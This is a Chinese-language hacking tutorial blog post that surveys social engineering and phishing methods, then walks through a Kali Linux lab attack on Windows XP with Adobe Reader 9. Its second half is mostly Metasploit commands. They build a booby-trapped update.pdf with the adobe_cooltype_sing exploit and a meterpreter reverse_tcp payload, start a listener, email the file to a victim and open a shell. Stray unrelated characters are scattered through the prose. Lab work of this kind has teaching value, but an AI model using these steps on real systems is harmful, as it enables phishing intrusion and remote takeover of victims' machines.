在上一篇文章中挎扰,小白介紹了一個(gè)名詞囚霸,叫做社會(huì)工程學(xué)腰根。社會(huì)工程學(xué)的核心是依賴(lài)于人類(lèi)的某種情緒,由情緒驅(qū)使人們?yōu)樽约簩ふ医杩趤?lái)繞過(guò)安全策略和規(guī)則的限制拓型,可以依賴(lài)的情緒包括貪婪额嘿、欲望、同情劣挫、好奇册养、虛榮、助人為樂(lè)压固、服從權(quán)威或避免沖突球拦、社會(huì)認(rèn)同。
著名黑客Kevin Mitnick在上世紀(jì)90年代讓“黑客社會(huì)工程學(xué)”這個(gè)術(shù)語(yǔ)流行了起來(lái),不過(guò)這個(gè)簡(jiǎn)單的概念本身(引誘某人去做某事,或者泄露敏感信息)卻早有年頭了. 專(zhuān)家們認(rèn)為,如今的黑客仍在繼續(xù)采用黑客社會(huì)工程學(xué)的新老伎倆盜竊密碼、安裝惡意軟件或者攫取利益坎炼,尤其是利用電話愧膀、email和網(wǎng)絡(luò)手段詐騙事件愈來(lái)愈猖狂的今天。
0x01 何為釣魚(yú)谣光?
社會(huì)工程學(xué)方法主要存在五種:假托(pretexting)檩淋、調(diào)虎離山(diversion theft)、釣魚(yú)(phishing)萄金、下餌(Baiting)蟀悦、等價(jià)交換(Quid pro quo)。而今天氧敢,小白就來(lái)為大家講講其中的釣魚(yú)(phishing)日戈。
釣魚(yú),又名網(wǎng)絡(luò)釣魚(yú)攻擊福稳,是一種企圖從電子通訊中涎拉,通過(guò)偽裝成可以信任的人或者機(jī)構(gòu)以獲得如用戶名、密碼和銀行卡明細(xì)等個(gè)人敏感信息的犯罪詐騙過(guò)程的圆。網(wǎng)釣通常是通過(guò)e-mail或者即時(shí)通訊進(jìn)行鼓拧。它常常導(dǎo)引用戶到URL與界面外觀與真正網(wǎng)站幾無(wú)二致的假冒網(wǎng)站輸入個(gè)人數(shù)據(jù)。就算使用強(qiáng)式加密的SSL服務(wù)器認(rèn)證越妈,要偵測(cè)網(wǎng)站是否仿冒實(shí)際上仍很困難季俩。
網(wǎng)絡(luò)釣魚(yú)攻擊技術(shù)包括:
鏈接操控
這種攻擊手段通常出現(xiàn)在郵箱、短信梅掠、QQ空間酌住、朋友圈等地方。通過(guò)發(fā)布大多數(shù)人感興趣的內(nèi)容阎抒,將你引導(dǎo)到惡意釣魚(yú)網(wǎng)站酪我,誘導(dǎo)你輸入賬號(hào)密碼信息。舉兩個(gè)很簡(jiǎn)單的例子且叁,蘋(píng)果手機(jī)丟失后你常常會(huì)收到這樣子的短信:
又或者是王者榮耀大禮包:
過(guò)濾器規(guī)避
現(xiàn)在的郵箱系統(tǒng)都挺不錯(cuò)的都哭,能夠自動(dòng)檢測(cè)郵件中是否存在類(lèi)似詐騙內(nèi)容。如果發(fā)現(xiàn)郵件內(nèi)的文字是圖片貼上去的而不是純文本逞带,這時(shí)候就要小心了欺矫。
網(wǎng)站偽造
網(wǎng)站偽造的特點(diǎn)是偽造的頁(yè)面與真實(shí)合法頁(yè)面幾乎一模一樣,無(wú)法直接分辨出來(lái)展氓,這時(shí)候就要仔細(xì)看域名信息是否真的合法穆趴。
高級(jí)一點(diǎn)的做法就是利用真實(shí)合法網(wǎng)站上存在的跨站腳本攻擊漏洞,鏈接到惡意網(wǎng)站遇汞,在不知不覺(jué)中獲取用戶的憑據(jù)未妹。
電話網(wǎng)釣
這個(gè)就不多說(shuō)了簿废,相信平時(shí)大家也被這些騷擾電話接怕了。
WIFI免費(fèi)熱點(diǎn)網(wǎng)釣
該技術(shù)的實(shí)現(xiàn)方法可以參考《小白客帶你走進(jìn)黑客世界16之小心公共wifi(kali linux下的無(wú)線攻擊技術(shù))》
隱蔽重定向漏洞
2014年5月络它,新加坡南洋理工大學(xué)壹位名叫王晶(Wang Jing)的物理和數(shù)學(xué)科學(xué)學(xué)院博士生捏鱼,發(fā)現(xiàn)了OAuth和OpenID開(kāi)源登錄工具的"隱蔽重定向漏洞"(英語(yǔ):Covert Redirect)。
攻擊者創(chuàng)建一個(gè)使用真實(shí)站點(diǎn)地址的彈出式登錄窗口——而不是使用一個(gè)假的域名——以引誘上網(wǎng)者輸入他們的個(gè)人信息酪耕。
黑客可利用該漏洞給釣魚(yú)網(wǎng)站“變裝”,用知名大型網(wǎng)站鏈接引誘用戶登錄釣魚(yú)網(wǎng)站轨淌,壹旦用戶訪問(wèn)釣魚(yú)網(wǎng)站并成功登陸授權(quán)迂烁,黑客即可讀取其在網(wǎng)站上存儲(chǔ)的私密信息。
如果你已經(jīng)看完了上面的文章递鹉,相信你已經(jīng)對(duì)釣魚(yú)攻擊有了一定的了解盟步。那么。接下來(lái)要做的事情就是利用kali linux實(shí)現(xiàn)一次釣魚(yú)攻擊躏结。
0x02 kali linux實(shí)現(xiàn)釣魚(yú)攻擊
實(shí)驗(yàn)環(huán)境:
攻擊者:
- 攻擊者郵箱一個(gè)
- Kali linux(攻擊主機(jī))一臺(tái)
被害者:
- 知曉被害者郵箱地址
- Windows xp +adobe reader 9(被害主機(jī))一臺(tái)
實(shí)驗(yàn)過(guò)程:
本次實(shí)驗(yàn)分為兩個(gè)部分却盘,第一部分,攻擊者制作發(fā)送釣魚(yú)郵件媳拴。第二部分黄橘,模擬被害者接收郵件。
第一步屈溉,攻擊者制作發(fā)送釣魚(yú)郵件
1.在kali linux控制臺(tái)中打開(kāi)metasploit滲透測(cè)試框架
相關(guān)命令:msfconsole
第二步塞关,制作釣魚(yú)用的pdf文件
1.加載CoolType字體文件SING表uniqueName字段棧溢出漏洞利用模塊
相關(guān)命令:
msf > use exploit/windows/fileformat/adobe_cooltype_sing
2.設(shè)置釣魚(yú)文件名稱(chēng)為update.pdf
相關(guān)命令:
msf exploit(adobe_cooltype_sing) > set filename update.pdf
3.設(shè)置攻擊載荷(payload)為反彈shell
相關(guān)命令:
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
4.設(shè)置本地地址(kali的地址)
相關(guān)命令:
msf exploit(adobe_cooltype_sing) > set lhost 192.168.1.144
5.設(shè)置本地端口(kali要接收的端口,可隨意)
相關(guān)命令:
msf exploit(adobe_cooltype_sing) > set lport 8888
6.生成釣魚(yú)文件
相關(guān)命令:
msf exploit(adobe_cooltype_sing) > exploit
7.復(fù)制生成的文件到用戶主目錄
相關(guān)命令:
msf exploit(adobe_cooltype_sing) > exit
root@kali:~# cp /root/.msf4/local/update.pdf ~/
第三步子巾,在kali上開(kāi)啟監(jiān)聽(tīng)帆赢,等待釣魚(yú)文件被打開(kāi)
1.在kali linux控制臺(tái)中打開(kāi)metasploit滲透測(cè)試框架
相關(guān)命令:msfconsole
2.使用metasploit shell反彈監(jiān)聽(tīng)模塊
相關(guān)命令:
msf > use exploit/multi/handler
3.設(shè)置攻擊載荷
相關(guān)命令:
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
4.設(shè)置本地ip(kali的ip)
相關(guān)命令:
msf exploit(handler) > set lhost 192.168.1.144
5.設(shè)置本地端口(釣魚(yú)文件生成時(shí)設(shè)置的端口)
相關(guān)命令:
msf exploit(handler) > set lport 8888
6.開(kāi)啟監(jiān)聽(tīng)
相關(guān)命令:
msf exploit(handler) > exploit
第四步,模擬攻擊者發(fā)送釣魚(yú)文件
1.登陸郵箱线梗,發(fā)送剛生成的釣魚(yú)文件
第五步椰于,模擬受害者接收郵件
1.模擬受害者打開(kāi)郵箱接收郵件并下載附件
2.模擬受害者雙擊打開(kāi)釣魚(yú)文件
第六步,回到kali linux仪搔,查看釣魚(yú)攻擊是否成功
1.查看監(jiān)聽(tīng)情況瘾婿,發(fā)現(xiàn)已經(jīng)連接上受害者的計(jì)算機(jī)
2.輸入命令,測(cè)試入侵效果
相關(guān)命令:
meterpreter > shell 打開(kāi)cmd命令行模式
ipconfig 查看受害者ip地址
Ps:喜歡的留個(gè)贊b( ̄ ̄)d ~也可以關(guān)注專(zhuān)題:黑客師僻造。
下一篇文章:小白客帶你走進(jìn)黑客世界19之領(lǐng)略metasploit的風(fēng)騷走位